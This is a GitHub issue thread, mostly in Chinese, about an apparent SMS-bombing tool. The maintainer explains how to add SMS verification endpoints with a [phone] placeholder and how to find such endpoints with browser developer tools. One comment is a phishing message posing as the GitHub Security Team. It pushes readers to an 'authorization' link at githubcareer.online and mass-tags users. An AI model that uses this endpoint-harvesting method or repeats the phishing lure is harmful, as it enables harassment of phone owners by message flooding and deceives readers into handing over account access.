### ISSUE TITLE
api.json这个文件的更新有教程吗？

### ISSUE THREAD

**Issue by Mengmengbai** [ottocsb/sms_boom_r#3]

**Comment by ottocsb** [comment]
提供接口可以直接pr，需要注意的是`[phone]`，接口填写手机号处字段修改为`[phone]`，如：`www.xxx.com/sendM?phoneNumber=[phone]`，具体示例你可以看下`api.json`。

**Comment by Mengmengbai** [comment]
我想问的是如何自己找这些api的接口，现在大部分的api都很快过期了

**Comment by ottocsb** [comment]
首先找到发送验证码的网站，打开浏览器的控制台，看网络栏，有验证码的api接口，把对应参数记录使用工具自己手动发一个，成功收到即可。

**Comment by guohaoyu110** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
goldmon, @husthzq, @lewisgit, @irony0egoist, @lerrorgk, @weolwo, @hantq, @hongmi, @zeratul-r, @zhoulvyuan, @Ronkiai1327, @yumiao1121, @pygman, @lvzhenchao, @yesmeck, @york-deng, @xuohei, @robot-factory, @devhg, @baryon

**Comment by 0x703cd8** [comment]
你好！      感谢你的来信，我会在查阅后尽快回复你。（自动回复）
